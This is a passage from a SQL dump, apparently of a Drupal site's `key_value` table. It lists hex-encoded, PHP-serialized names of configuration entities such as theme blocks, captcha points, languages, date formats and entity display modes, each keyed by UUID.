('config.entity.key_store.block', 'uuid:3ebd4053-eda0-4188-8d88-fa240de38790', 0x613a313a7b693a303b733a32373a22626c6f636b2e626c6f636b2e667574757265676f616c7469746c65223b7d),
('config.entity.key_store.block', 'uuid:3f16e2ad-280a-4eeb-ac2c-acb223458018', 0x613a313a7b693a303b733a33313a22626c6f636b2e626c6f636b2e6e65775f636f6d65745f6d61696e5f6d656e75223b7d),
('config.entity.key_store.block', 'uuid:406e6037-c8ff-4cc4-84a4-e1c2f442a640', 0x613a313a7b693a303b733a32323a22626c6f636b2e626c6f636b2e636c61726f5f68656c70223b7d),
('config.entity.key_store.block', 'uuid:40ccce6a-3988-4e1e-aea9-470d85865fca', 0x613a313a7b693a303b733a34313a22626c6f636b2e626c6f636b2e6f6c697665726f5f7072696d6172795f61646d696e5f616374696f6e73223b7d),
('config.entity.key_store.block', 'uuid:41e5c186-d2a4-4086-b95b-1ff6cf696ce9', 0x613a313a7b693a303b733a32363a22626c6f636b2e626c6f636b2e636f6d70616e7970726f66696c65223b7d),
('config.entity.key_store.block', 'uuid:424af2cf-d56a-4945-97cc-e1d452bbc548', 0x613a313a7b693a303b733a34303a22626c6f636b2e626c6f636b2e6e65775f636f6d65745f6d6f72656c616e677561676563656e746572223b7d),
('config.entity.key_store.block', 'uuid:49f779e0-8e2e-4f2b-85d1-4e05ab0469c1', 0x613a313a7b693a303b733a32303a22626c6f636b2e626c6f636b2e6d61696e6d656e75223b7d),
('config.entity.key_store.block', 'uuid:50cbb714-2afe-4716-a465-fc0e9bce0ad3', 0x613a313a7b693a303b733a32333a22626c6f636b2e626c6f636b2e636f6e7461637475735f32223b7d),
('config.entity.key_store.block', 'uuid:522057b0-42ef-400a-af7c-d2653a7762ad', 0x613a313a7b693a303b733a33313a22626c6f636b2e626c6f636b2e636f6d70616e79686973746f72797469746c65223b7d),
('config.entity.key_store.block', 'uuid:56e18baa-8d9d-40f2-9811-dd99192e3e74', 0x613a313a7b693a303b733a33323a22626c6f636b2e626c6f636b2e6e65775f636f6d65745f706167655f7469746c65223b7d),
('config.entity.key_store.block', 'uuid:59af507e-95cf-4210-be47-7bbade09efc0', 0x613a313a7b693a303b733a35373a22626c6f636b2e626c6f636b2e6e65775f636f6d65745f76696577735f626c6f636b5f5f72656c617465645f626c6f636b735f626c6f636b5f33223b7d),
('config.entity.key_store.block', 'uuid:5b8d2a7a-86a1-417e-8f34-dbcb84e14e92', 0x613a313a7b693a303b733a34313a22626c6f636b2e626c6f636b2e76696577735f626c6f636b5f5f61637469766974795f626c6f636b5f31223b7d),
('config.entity.key_store.block', 'uuid:5bf10f10-aaa5-4f21-a4e8-886fb552409f', 0x613a313a7b693a303b733a34373a22626c6f636b2e626c6f636b2e76696577735f626c6f636b5f5f72656c617465645f626c6f636b735f626c6f636b5f32223b7d),
('config.entity.key_store.block', 'uuid:5c5a66ca-fa8c-4a60-84f2-4102135394c5', 0x613a313a7b693a303b733a34313a22626c6f636b2e626c6f636b2e6e65775f636f6d65745f6c616e677561676563656e7465727469746c65223b7d),
('config.entity.key_store.block', 'uuid:65d0b8b3-5381-4503-8706-ab541c7ce5cd', 0x613a313a7b693a303b733a33363a22626c6f636b2e626c6f636b2e6c616e677561676564726f70646f776e7377697463686572223b7d),
('config.entity.key_store.block', 'uuid:67551bbe-3f57-419c-9344-61b7a3181d57', 0x613a313a7b693a303b733a33303a22626c6f636b2e626c6f636b2e6f6c697665726f5f706167655f7469746c65223b7d),
('config.entity.key_store.block', 'uuid:6a6983bd-1547-4705-96b9-cdb59a042727', 0x613a313a7b693a303b733a32393a22626c6f636b2e626c6f636b2e616e6e6f756e63656d656e747469746c65223b7d),
('config.entity.key_store.block', 'uuid:6ee969f9-da08-488c-a5ee-e14bf5f42bf3', 0x613a313a7b693a303b733a32363a22626c6f636b2e626c6f636b2e636c61726f5f6d65737361676573223b7d),
('config.entity.key_store.block', 'uuid:78682536-9309-4461-baec-af10515d7082', 0x613a313a7b693a303b733a32383a22626c6f636b2e626c6f636b2e6d6f7265616e6e6f756e63656d656e74223b7d),
('config.entity.key_store.block', 'uuid:7928253c-18f3-4df7-b571-2ffb41b88b15', 0x613a313a7b693a303b733a32343a22626c6f636b2e626c6f636b2e6d6f72656163746976697479223b7d),
('config.entity.key_store.block', 'uuid:7f9b13bd-530b-44b2-b0d2-51e9aa34988a', 0x613a313a7b693a303b733a32393a22626c6f636b2e626c6f636b2e6f6c697665726f5f73796e646963617465223b7d),
('config.entity.key_store.block', 'uuid:81446ed7-4b0d-40b9-8619-d6d952b08e1a', 0x613a313a7b693a303b733a32303a22626c6f636b2e626c6f636b2e66616365626f6f6b223b7d),
('config.entity.key_store.block', 'uuid:8279768d-ad03-4c31-82aa-bc9314dbcc82', 0x613a313a7b693a303b733a32383a22626c6f636b2e626c6f636b2e6f757273657276696365737469746c65223b7d),
('config.entity.key_store.block', 'uuid:8650d90c-464a-4039-98bd-306c88ad6926', 0x613a313a7b693a303b733a32383a22626c6f636b2e626c6f636b2e6e65775f636f6d65745f736561726368223b7d),
('config.entity.key_store.block', 'uuid:86ef4eb8-04b7-4d86-b598-4ab65b705ace', 0x613a313a7b693a303b733a33393a22626c6f636b2e626c6f636b2e6f6c697665726f5f7072696d6172795f6c6f63616c5f7461736b73223b7d),
('config.entity.key_store.block', 'uuid:882db79d-6faa-47f7-89f8-5c1223b522d7', 0x613a313a7b693a303b733a33393a22626c6f636b2e626c6f636b2e636c61726f5f7365636f6e646172795f6c6f63616c5f7461736b73223b7d),
('config.entity.key_store.block', 'uuid:904de377-4997-4ba2-a5da-2d729e1e6510', 0x613a313a7b693a303b733a33373a22626c6f636b2e626c6f636b2e636c61726f5f7072696d6172795f6c6f63616c5f7461736b73223b7d),
('config.entity.key_store.block', 'uuid:905aa7d4-fd0e-41e9-9519-4a0c4ab90122', 0x613a313a7b693a303b733a33303a22626c6f636b2e626c6f636b2e6e65775f636f6d65745f6d65737361676573223b7d),
('config.entity.key_store.block', 'uuid:93092b58-e0e2-421e-8fd6-1ea8d2970047', 0x613a313a7b693a303b733a33313a22626c6f636b2e626c6f636b2e6f6c697665726f5f62726561646372756d6273223b7d),
('config.entity.key_store.block', 'uuid:9477dd43-0e59-41ef-8af1-87cf16e4c4d1', 0x613a313a7b693a303b733a32393a22626c6f636b2e626c6f636b2e6e65775f636f6d65745f636f6e74656e74223b7d),
('config.entity.key_store.block', 'uuid:99123281-c5d5-4c1d-a1aa-d07f902b6dda', 0x613a313a7b693a303b733a32323a22626c6f636b2e626c6f636b2e667574757265676f616c223b7d),
('config.entity.key_store.block', 'uuid:9d5f902b-ad4d-45f7-be5b-4a2eda49f317', 0x613a313a7b693a303b733a32313a22626c6f636b2e626c6f636b2e636f6e746163747573223b7d),
('config.entity.key_store.block', 'uuid:9dfed6be-13bf-4bcc-8a05-3b79f8a6179b', 0x613a313a7b693a303b733a32373a22626c6f636b2e626c6f636b2e6f6c697665726f5f706f7765726564223b7d),
('config.entity.key_store.block', 'uuid:a3fbb003-dd1d-4bfd-9a93-fb1f093d5168', 0x613a313a7b693a303b733a32353a22626c6f636b2e626c6f636b2e766973696f6e6d697373696f6e223b7d),
('config.entity.key_store.block', 'uuid:a4dd443f-ca8b-459a-ac9a-b2ceb6e085df', 0x613a313a7b693a303b733a33303a22626c6f636b2e626c6f636b2e6d697373696f6e766973696f6e7469746c65223b7d),
('config.entity.key_store.block', 'uuid:b714f9b9-4054-4fe4-aaf6-c45fa203443d', 0x613a313a7b693a303b733a33343a22626c6f636b2e626c6f636b2e6e65775f636f6d65745f6163636f756e745f6d656e75223b7d),
('config.entity.key_store.block', 'uuid:b8235e55-f0d6-4860-bfeb-9cfad865b1c1', 0x613a313a7b693a303b733a33333a22626c6f636b2e626c6f636b2e6e65775f636f6d65745f6c6f63616c5f7461736b73223b7d),
('config.entity.key_store.block', 'uuid:bb26e1f4-874d-4e2c-8259-56634750c72c', 0x613a313a7b693a303b733a33323a22626c6f636b2e626c6f636b2e6f6c697665726f5f6163636f756e745f6d656e75223b7d),
('config.entity.key_store.block', 'uuid:bd0aada0-0874-4006-9ddd-3d9e979efb19', 0x613a313a7b693a303b733a33333a22626c6f636b2e626c6f636b2e6f6c697665726f5f736974655f6272616e64696e67223b7d),
('config.entity.key_store.block', 'uuid:bd3f3b21-176f-41ba-be37-b0a0f0f390d3', 0x613a313a7b693a303b733a33333a22626c6f636b2e626c6f636b2e6e65775f636f6d65745f62726561646372756d6273223b7d),
('config.entity.key_store.block', 'uuid:c1665859-da51-4b88-92eb-995ca817a1b1', 0x613a313a7b693a303b733a32363a22626c6f636b2e626c6f636b2e636f6e7461637475737469746c65223b7d),
('config.entity.key_store.block', 'uuid:c20d8aa9-7679-404f-b586-fe2e526b877a', 0x613a313a7b693a303b733a34353a22626c6f636b2e626c6f636b2e76696577735f626c6f636b5f5f616e6e6f756e63656d656e745f626c6f636b5f31223b7d),
('config.entity.key_store.block', 'uuid:c70a48f4-a0a7-41f2-bad4-3e32f19cd552', 0x613a313a7b693a303b733a32343a22626c6f636b2e626c6f636b2e6f6c697665726f5f68656c70223b7d),
('config.entity.key_store.block', 'uuid:c9017c87-f121-4c0b-8d53-43b3512692b8', 0x613a313a7b693a303b733a32373a22626c6f636b2e626c6f636b2e6e65775f636f6d65745f6c6f67696e223b7d),
('config.entity.key_store.block', 'uuid:d2089e5c-8b7b-494c-999c-394217fbfa7f', 0x613a313a7b693a303b733a33383a22626c6f636b2e626c6f636b2e6f6c697665726f5f7365617263685f666f726d5f6e6172726f77223b7d),
('config.entity.key_store.block', 'uuid:dcb4f9fe-03f8-4fdd-bc56-a7ec4a070c68', 0x613a313a7b693a303b733a33353a22626c6f636b2e626c6f636b2e6e65775f636f6d65745f6c6f63616c5f616374696f6e73223b7d),
('config.entity.key_store.block', 'uuid:e4f2780e-f554-42a7-af82-0a8197f0aada', 0x613a313a7b693a303b733a32383a22626c6f636b2e626c6f636b2e636c61726f5f706167655f7469746c65223b7d),
('config.entity.key_store.block', 'uuid:ee6e29e2-ee87-40d8-acb5-a5deaed2ae48', 0x613a313a7b693a303b733a34313a22626c6f636b2e626c6f636b2e6f6c697665726f5f7365636f6e646172795f6c6f63616c5f7461736b73223b7d),
('config.entity.key_store.block', 'uuid:f00154d0-dd5d-445a-b830-4ba43080fa7f', 0x613a313a7b693a303b733a32313a22626c6f636b2e626c6f636b2e636f70797269676874223b7d),
('config.entity.key_store.block', 'uuid:fed6979b-6249-4154-855d-9fa9ad29171a', 0x613a313a7b693a303b733a32343a22626c6f636b2e626c6f636b2e61626f757475737469746c65223b7d),
('config.entity.key_store.block', 'uuid:ff237b5f-ac38-4c95-9f4f-80fc0bf8b3db', 0x613a313a7b693a303b733a32373a22626c6f636b2e626c6f636b2e616374697669746965737469746c65223b7d),
('config.entity.key_store.block_content_type', 'uuid:630c32f9-d32c-43e5-9b38-2ebe03e1af5b', 0x613a313a7b693a303b733a32343a22626c6f636b5f636f6e74656e742e747970652e6261736963223b7d),
('config.entity.key_store.captcha_point', 'uuid:27f510d8-25d2-4e44-8b35-d9757311c169', 0x613a313a7b693a303b733a35313a22636170746368612e636170746368615f706f696e742e636f6e746163745f6d6573736167655f706572736f6e616c5f666f726d223b7d),
('config.entity.key_store.captcha_point', 'uuid:2c0c1bf1-4e75-405f-8dfa-be2a7325210b', 0x613a313a7b693a303b733a34303a22636170746368612e636170746368615f706f696e742e757365725f72656769737465725f666f726d223b7d),
('config.entity.key_store.captcha_point', 'uuid:39d00bea-7061-41cd-83e8-610f47f577be', 0x613a313a7b693a303b733a35313a22636170746368612e636170746368615f706f696e742e636f6e746163745f6d6573736167655f666565646261636b5f666f726d223b7d),
('config.entity.key_store.captcha_point', 'uuid:6dad055a-ef3e-49aa-ac1b-29dedc033dc8', 0x613a313a7b693a303b733a33393a22636170746368612e636170746368615f706f696e742e6e6f64655f61727469636c655f666f726d223b7d),
('config.entity.key_store.captcha_point', 'uuid:724f6fcc-fdc2-4aed-8f54-7b97a96bd1ae', 0x613a313a7b693a303b733a34323a22636170746368612e636170746368615f706f696e742e6e6f64655f616374697669746965735f666f726d223b7d),
('config.entity.key_store.captcha_point', 'uuid:8ae9bc37-7b3d-43fe-8186-f34d529ffe7b', 0x613a313a7b693a303b733a33373a22636170746368612e636170746368615f706f696e742e757365725f6c6f67696e5f666f726d223b7d),
('config.entity.key_store.captcha_point', 'uuid:a4696e1c-1517-47ac-8cbc-94938232fe83', 0x613a313a7b693a303b733a33313a22636170746368612e636170746368615f706f696e742e757365725f70617373223b7d),
('config.entity.key_store.captcha_point', 'uuid:c8d4594e-4247-4f61-8156-4ee09a28e931', 0x613a313a7b693a303b733a33363a22636170746368612e636170746368615f706f696e742e6e6f64655f706167655f666f726d223b7d),
('config.entity.key_store.captcha_point', 'uuid:f09fcfca-5a5d-463d-9b1b-8b8179d71e19', 0x613a313a7b693a303b733a34343a22636170746368612e636170746368615f706f696e742e6e6f64655f616e6e6f756e63656d656e745f666f726d223b7d),
('config.entity.key_store.comment_type', 'uuid:40cccc09-7b55-455b-833f-6216ac59489c', 0x613a313a7b693a303b733a32303a22636f6d6d656e742e747970652e636f6d6d656e74223b7d),
('config.entity.key_store.configurable_language', 'uuid:049ec4c7-fd32-490e-8b36-d2de25d2e959', 0x613a313a7b693a303b733a31383a226c616e67756167652e656e746974792e6b6f223b7d),
('config.entity.key_store.configurable_language', 'uuid:17944ee7-71ab-4fbc-8a38-837cb4097f57', 0x613a313a7b693a303b733a31383a226c616e67756167652e656e746974792e656e223b7d),
('config.entity.key_store.configurable_language', 'uuid:4d9fa459-ab06-4eb5-8fdc-b7587cbf8af5', 0x613a313a7b693a303b733a31393a226c616e67756167652e656e746974792e756e64223b7d),
('config.entity.key_store.configurable_language', 'uuid:53f2b2b7-38ea-4fa0-a3e6-30ba0409d0e2', 0x613a313a7b693a303b733a31393a226c616e67756167652e656e746974792e7a7878223b7d),
('config.entity.key_store.configurable_language', 'uuid:78b50cfd-e166-4996-bc29-4b6fa9031cc6', 0x613a313a7b693a303b733a31383a226c616e67756167652e656e746974792e6a61223b7d),
('config.entity.key_store.contact_form', 'uuid:7fc0863d-e2d9-4d7c-b454-e36dd88ff88b', 0x613a313a7b693a303b733a32313a22636f6e746163742e666f726d2e666565646261636b223b7d),
('config.entity.key_store.contact_form', 'uuid:ef614094-9d14-4c43-aa04-56849e43b85d', 0x613a313a7b693a303b733a32313a22636f6e746163742e666f726d2e706572736f6e616c223b7d),
('config.entity.key_store.date_format', 'uuid:19328b88-4e6c-4d9f-a948-ca004d639ffc', 0x613a313a7b693a303b733a32373a22636f72652e646174655f666f726d61742e68746d6c5f6d6f6e7468223b7d),
('config.entity.key_store.date_format', 'uuid:20644a1d-0a7e-43c2-9b06-925a3898b0b3', 0x613a313a7b693a303b733a32363a22636f72652e646174655f666f726d61742e68746d6c5f7765656b223b7d),
('config.entity.key_store.date_format', 'uuid:39c351a0-b947-4271-8742-1aab6e3538fc', 0x613a313a7b693a303b733a32323a22636f72652e646174655f666f726d61742e73686f7274223b7d),
('config.entity.key_store.date_format', 'uuid:652648f0-1ff9-4d84-b328-92a87669ae69', 0x613a313a7b693a303b733a32363a22636f72652e646174655f666f726d61742e68746d6c5f64617465223b7d),
('config.entity.key_store.date_format', 'uuid:676ba7e1-c14b-4f58-870c-b82df57a636b', 0x613a313a7b693a303b733a32363a22636f72652e646174655f666f726d61742e68746d6c5f79656172223b7d),
('config.entity.key_store.date_format', 'uuid:73c8602b-ca50-45f7-b350-c034dd437976', 0x613a313a7b693a303b733a32333a22636f72652e646174655f666f726d61742e6d656469756d223b7d),
('config.entity.key_store.date_format', 'uuid:7763c3b9-cb58-467f-b0eb-90d05b05b1d4', 0x613a313a7b693a303b733a33303a22636f72652e646174655f666f726d61742e68746d6c5f6461746574696d65223b7d),
('config.entity.key_store.date_format', 'uuid:7def31b5-02d5-4d9c-a4a6-4d0450c16581', 0x613a313a7b693a303b733a32353a22636f72652e646174655f666f726d61742e66616c6c6261636b223b7d),
('config.entity.key_store.date_format', 'uuid:8257590e-163c-4d21-8cdb-4e558fd31048', 0x613a313a7b693a303b733a32313a22636f72652e646174655f666f726d61742e6c6f6e67223b7d),
('config.entity.key_store.date_format', 'uuid:8a8898de-1fb4-4416-a102-eddd73212223', 0x613a313a7b693a303b733a33313a22636f72652e646174655f666f726d61742e6f6c697665726f5f6d656469756d223b7d),
('config.entity.key_store.date_format', 'uuid:ead5791c-69c8-416c-96f1-53329d65d5bb', 0x613a313a7b693a303b733a32363a22636f72652e646174655f666f726d61742e68746d6c5f74696d65223b7d),
('config.entity.key_store.date_format', 'uuid:f9c032ad-88a2-49c5-9efb-3b1851d1b62b', 0x613a313a7b693a303b733a33353a22636f72652e646174655f666f726d61742e68746d6c5f796561726c6573735f64617465223b7d),
('config.entity.key_store.editor', 'uuid:049b5d15-c250-4eae-99d5-8235c2e1fe3e', 0x613a313a7b693a303b733a32333a22656469746f722e656469746f722e66756c6c5f68746d6c223b7d),
('config.entity.key_store.editor', 'uuid:e08b764a-a257-4f65-8c79-be40b9cbcf70', 0x613a313a7b693a303b733a32343a22656469746f722e656469746f722e62617369635f68746d6c223b7d),
('config.entity.key_store.entity_form_display', 'uuid:00d9d1b2-f04f-4593-9ece-63c6903edc39', 0x613a313a7b693a303b733a34353a22636f72652e656e746974795f666f726d5f646973706c61792e6e6f64652e61727469636c652e64656661756c74223b7d),
('config.entity.key_store.entity_form_display', 'uuid:1a55b864-2bd5-433f-bb0d-851cb7fab764', 0x613a313a7b693a303b733a35303a22636f72652e656e746974795f666f726d5f646973706c61792e6d656469612e617564696f2e6d656469615f6c696272617279223b7d),
('config.entity.key_store.entity_form_display', 'uuid:1ae7fd7c-1d48-446e-8e1f-e3df04c7a872', 0x613a313a7b693a303b733a35333a22636f72652e656e746974795f666f726d5f646973706c61792e6d656469612e646f63756d656e742e6d656469615f6c696272617279223b7d),
('config.entity.key_store.entity_form_display', 'uuid:2cb5993e-350d-4f32-9563-0d37fb22c144', 0x613a313a7b693a303b733a34343a22636f72652e656e746974795f666f726d5f646973706c61792e6d656469612e617564696f2e64656661756c74223b7d),
('config.entity.key_store.entity_form_display', 'uuid:31cd1bba-2a16-40d2-aaf7-f0f3972f6c32', 0x613a313a7b693a303b733a35373a22636f72652e656e746974795f666f726d5f646973706c61792e6d656469612e72656d6f74655f766964656f2e6d656469615f6c696272617279223b7d),
('config.entity.key_store.entity_form_display', 'uuid:37394d57-88e0-41d0-b8a0-ad4238723fb5', 0x613a313a7b693a303b733a35333a22636f72652e656e746974795f666f726d5f646973706c61792e6e6f64652e6c616e67756167655f63656e7465722e64656661756c74223b7d),
('config.entity.key_store.entity_form_display', 'uuid:4c08de5e-52cc-4822-ad5d-402e2d5e4da3', 0x613a313a7b693a303b733a35303a22636f72652e656e746974795f666f726d5f646973706c61792e6d656469612e766964656f2e6d656469615f6c696272617279223b7d),
('config.entity.key_store.entity_form_display', 'uuid:55b73fc2-e36c-4832-b4c8-041987b77425', 0x613a313a7b693a303b733a34323a22636f72652e656e746974795f666f726d5f646973706c61792e757365722e757365722e64656661756c74223b7d),
('config.entity.key_store.entity_form_display', 'uuid:6b725485-cc41-42e7-842b-e395a6ffc048', 0x613a313a7b693a303b733a34343a22636f72652e656e746974795f666f726d5f646973706c61792e6d656469612e696d6167652e64656661756c74223b7d),
('config.entity.key_store.entity_form_display', 'uuid:7acb350f-c1f7-479c-b013-225c4f528ab4', 0x613a313a7b693a303b733a34383a22636f72652e656e746974795f666f726d5f646973706c61792e636f6d6d656e742e636f6d6d656e742e64656661756c74223b7d),
('config.entity.key_store.entity_form_display', 'uuid:957fd832-ff2b-445b-9ac1-062737b5582c', 0x613a313a7b693a303b733a34323a22636f72652e656e746974795f666f726d5f646973706c61792e6e6f64652e706167652e64656661756c74223b7d),
('config.entity.key_store.entity_form_display', 'uuid:a2188efd-de19-44d6-89ee-2c6ba4f18744', 0x613a313a7b693a303b733a34373a22636f72652e656e746974795f666f726d5f646973706c61792e6d656469612e646f63756d656e742e64656661756c74223b7d),
('config.entity.key_store.entity_form_display', 'uuid:c3986dd7-3d1f-4996-860f-519289362973', 0x613a313a7b693a303b733a34383a22636f72652e656e746974795f666f726d5f646973706c61792e6e6f64652e616374697669746965732e64656661756c74223b7d),
('config.entity.key_store.entity_form_display', 'uuid:c414e537-3a26-4d5e-b400-1a175bef2fb0', 0x613a313a7b693a303b733a35323a22636f72652e656e746974795f666f726d5f646973706c61792e626c6f636b5f636f6e74656e742e62617369632e64656661756c74223b7d),
('config.entity.key_store.entity_form_display', 'uuid:caa47904-f9f6-41cb-9e8c-6e92b3fe1d59', 0x613a313a7b693a303b733a35303a22636f72652e656e746974795f666f726d5f646973706c61792e6e6f64652e616e6e6f756e63656d656e742e64656661756c74223b7d),
('config.entity.key_store.entity_form_display', 'uuid:cace760f-25fc-47da-b5f8-44a260ad593f', 0x613a313a7b693a303b733a35313a22636f72652e656e746974795f666f726d5f646973706c61792e6d656469612e72656d6f74655f766964656f2e64656661756c74223b7d),
('config.entity.key_store.entity_form_display', 'uuid:d5d36a44-d953-40a8-8a39-52443432a323', 0x613a313a7b693a303b733a34343a22636f72652e656e746974795f666f726d5f646973706c61792e6e6f64652e736c696465722e64656661756c74223b7d),
('config.entity.key_store.entity_form_display', 'uuid:e5b8a0ff-4ec2-4f84-9c98-9f5054b80785', 0x613a313a7b693a303b733a35303a22636f72652e656e746974795f666f726d5f646973706c61792e6d656469612e696d6167652e6d656469615f6c696272617279223b7d),
('config.entity.key_store.entity_form_display', 'uuid:e713a83d-7584-4788-aa43-80351df8f112', 0x613a313a7b693a303b733a34343a22636f72652e656e746974795f666f726d5f646973706c61792e6d656469612e766964656f2e64656661756c74223b7d),
('config.entity.key_store.entity_form_mode', 'uuid:5e22e009-7026-477c-83e7-75a80a0c1633', 0x613a313a7b693a303b733a34313a22636f72652e656e746974795f666f726d5f6d6f64652e6d656469612e6d656469615f6c696272617279223b7d),
('config.entity.key_store.entity_form_mode', 'uuid:e22cb311-485a-4627-8989-63e5fcbe2821', 0x613a313a7b693a303b733a33353a22636f72652e656e746974795f666f726d5f6d6f64652e757365722e7265676973746572223b7d),
('config.entity.key_store.entity_view_display', 'uuid:0da92c20-1d1c-43f8-810f-3878fc64a0da', 0x613a313a7b693a303b733a34333a22636f72652e656e746974795f766965775f646973706c61792e6e6f64652e736c696465722e746561736572223b7d),
('config.entity.key_store.entity_view_display', 'uuid:0dfa53cb-3077-43b0-903e-d35299837b0d', 0x613a313a7b693a303b733a34353a22636f72652e656e746974795f766965775f646973706c61792e6e6f64652e61727469636c652e64656661756c74223b7d);
INSERT INTO `key_value` (`collection`, `name`, `value`) VALUES
('config.entity.key_store.entity_view_display', 'uuid:0e3cf26a-4751-4b0d-9c52-ffc78c52b2e8', 0x613a313a7b693a303b733a34323a22636f72652e656e746974795f766965775f646973706c61792e757365722e757365722e64656661756c74223b7d),
('config.entity.key_store.entity_view_display', 'uuid:11218980-40d3-4106-82eb-d10e44d0aeb3', 0x613a313a7b693a303b733a35323a22636f72652e656e746974795f766965775f646973706c61792e6e6f64652e6c616e67756167655f63656e7465722e746561736572223b7d),
('config.entity.key_store.entity_view_display', 'uuid:3b77e3c3-467e-4f83-8a9f-62fbdea4e134', 0x613a313a7b693a303b733a34383a22636f72652e656e746974795f766965775f646973706c61792e6e6f64652e616374697669746965732e64656661756c74223b7d),
('config.entity.key_store.entity_view_display', 'uuid:57055fbc-7b6e-47dd-a629-5f1b134f337f', 0x613a313a7b693a303b733a34373a22636f72652e656e746974795f766965775f646973706c61792e6d656469612e646f63756d656e742e64656661756c74223b7d),
('config.entity.key_store.entity_view_display', 'uuid:67c30190-62fe-4571-8681-3e86468b20e2', 0x613a313a7b693a303b733a35333a22636f72652e656e746974795f766965775f646973706c61792e6d656469612e646f63756d656e742e6d656469615f6c696272617279223b7d),
('config.entity.key_store.entity_view_display', 'uuid:6bd98a08-ef24-4ce2-997f-18b348b3cbaa', 0x613a313a7b693a303b733a35303a22636f72652e656e746974795f766965775f646973706c61792e6e6f64652e616e6e6f756e63656d656e742e64656661756c74223b7d),
('config.entity.key_store.entity_view_display', 'uuid:89284560-0ca2-4234-9dcf-e575fd6bd2fa', 0x613a313a7b693a303b733a35303a22636f72652e656e746974795f766965775f646973706c61792e6d656469612e696d6167652e6d656469615f6c696272617279223b7d),
('config.entity.key_store.entity_view_display', 'uuid:937f73b2-751a-4d4c-930a-bd710fbaccb9', 0x613a313a7b693a303b733a34383a22636f72652e656e746974795f766965775f646973706c61792e636f6d6d656e742e636f6d6d656e742e64656661756c74223b7d),
('config.entity.key_store.entity_view_display', 'uuid:96cf6a46-cfd0-4fc7-9339-05522ca079ae', 0x613a313a7b693a303b733a34313a22636f72652e656e746974795f766965775f646973706c61792e6e6f64652e61727469636c652e727373223b7d),
('config.entity.key_store.entity_view_display', 'uuid:97196983-93fe-4431-a95d-6fda7b4e7ccb', 0x613a313a7b693a303b733a35323a22636f72652e656e746974795f766965775f646973706c61792e626c6f636b5f636f6e74656e742e62617369632e64656661756c74223b7d),
('config.entity.key_store.entity_view_display', 'uuid:9f1f22e1-ecf8-4de9-93f3-8535e8a9b38c', 0x613a313a7b693a303b733a35313a22636f72652e656e746974795f766965775f646973706c61792e6d656469612e72656d6f74655f766964656f2e64656661756c74223b7d),
('config.entity.key_store.entity_view_display', 'uuid:a6d417d2-8cb3-43f0-abaa-de16970688d1', 0x613a313a7b693a303b733a35303a22636f72652e656e746974795f766965775f646973706c61792e6d656469612e617564696f2e6d656469615f6c696272617279223b7d),
('config.entity.key_store.entity_view_display', 'uuid:b483f6da-a293-476a-8a2f-407eea44a240', 0x613a313a7b693a303b733a34373a22636f72652e656e746974795f766965775f646973706c61792e6e6f64652e616374697669746965732e746561736572223b7d),
('config.entity.key_store.entity_view_display', 'uuid:b4b31636-2707-401d-9d44-7973f324b7da', 0x613a313a7b693a303b733a34343a22636f72652e656e746974795f766965775f646973706c61792e6e6f64652e736c696465722e64656661756c74223b7d),
('config.entity.key_store.entity_view_display', 'uuid:b5b76f7c-373a-41b9-8692-6cbfd8e385b8', 0x613a313a7b693a303b733a34323a22636f72652e656e746974795f766965775f646973706c61792e6e6f64652e706167652e64656661756c74223b7d),
('config.entity.key_store.entity_view_display', 'uuid:be4c1ede-0b79-43d3-9a4a-bd3bb8a216cd', 0x613a313a7b693a303b733a35333a22636f72652e656e746974795f766965775f646973706c61792e6e6f64652e6c616e67756167655f63656e7465722e64656661756c74223b7d),
('config.entity.key_store.entity_view_display', 'uuid:be5cdc90-2275-4686-bfe0-b18036bf6591', 0x613a313a7b693a303b733a34323a22636f72652e656e746974795f766965775f646973706c61792e757365722e757365722e636f6d70616374223b7d),
('config.entity.key_store.entity_view_display', 'uuid:d19198f6-3fdd-45e6-b6db-9fc3872eed1c', 0x613a313a7b693a303b733a35303a22636f72652e656e746974795f766965775f646973706c61792e6d656469612e766964656f2e6d656469615f6c696272617279223b7d),
('config.entity.key_store.entity_view_display', 'uuid:d28e92e6-bee5-4f90-8ff9-60f3cd144c80', 0x613a313a7b693a303b733a34343a22636f72652e656e746974795f766965775f646973706c61792e6d656469612e617564696f2e64656661756c74223b7d),
('config.entity.key_store.entity_view_display', 'uuid:dd5ab81c-0250-41cd-8d15-fbc9c0fc5f66', 0x613a313a7b693a303b733a34343a22636f72652e656e746974795f766965775f646973706c61792e6e6f64652e61727469636c652e746561736572223b7d),
('config.entity.key_store.entity_view_display', 'uuid:df4bcddb-6338-4f55-ba51-7a93ef85112a', 0x613a313a7b693a303b733a34393a22636f72652e656e746974795f766965775f646973706c61792e6e6f64652e616e6e6f756e63656d656e742e746561736572223b7d),
('config.entity.key_store.entity_view_display', 'uuid:e0c1823c-a579-43d5-b8af-253d351f91e2', 0x613a313a7b693a303b733a34313a22636f72652e656e746974795f766965775f646973706c61792e6e6f64652e706167652e746561736572223b7d),
('config.entity.key_store.entity_view_display', 'uuid:ea969dc1-caa7-46ef-968e-fad7be528a52', 0x613a313a7b693a303b733a34343a22636f72652e656e746974795f766965775f646973706c61792e6d656469612e766964656f2e64656661756c74223b7d),
('config.entity.key_store.entity_view_display', 'uuid:f9212e94-31da-422b-bfe4-380764371c9f', 0x613a313a7b693a303b733a34343a22636f72652e656e746974795f766965775f646973706c61792e6d656469612e696d6167652e64656661756c74223b7d),
('config.entity.key_store.entity_view_display', 'uuid:fae731a2-2c9d-46b0-b22d-1b967b0f289e', 0x613a313a7b693a303b733a35373a22636f72652e656e746974795f766965775f646973706c61792e6d656469612e72656d6f74655f766964656f2e6d656469615f6c696272617279223b7d),
('config.entity.key_store.entity_view_mode', 'uuid:0793b5f8-9292-4202-a189-544d1a4ddcde', 0x613a313a7b693a303b733a34313a22636f72652e656e746974795f766965775f6d6f64652e626c6f636b5f636f6e74656e742e746f6b656e223b7d),
('config.entity.key_store.entity_view_mode', 'uuid:1f708336-2dd3-4b41-a2a5-14e15ac1c5b1', 0x613a313a7b693a303b733a34353a22636f72652e656e746974795f766965775f6d6f64652e6d656e755f6c696e6b5f636f6e74656e742e746f6b656e223b7d),
('config.entity.key_store.entity_view_mode', 'uuid:3472a76b-fcfc-4fdd-8bf3-9c23e57f92b2', 0x613a313a7b693a303b733a33363a22636f72652e656e746974795f766965775f6d6f64652e73686f72746375742e746f6b656e223b7d),
('config.entity.key_store.entity_view_mode', 'uuid:49c2bab4-c8ea-4bc4-b730-84a21c0f6b1e', 0x613a313a7b693a303b733a33383a22636f72652e656e746974795f766965775f6d6f64652e706174685f616c6961732e746f6b656e223b7d),
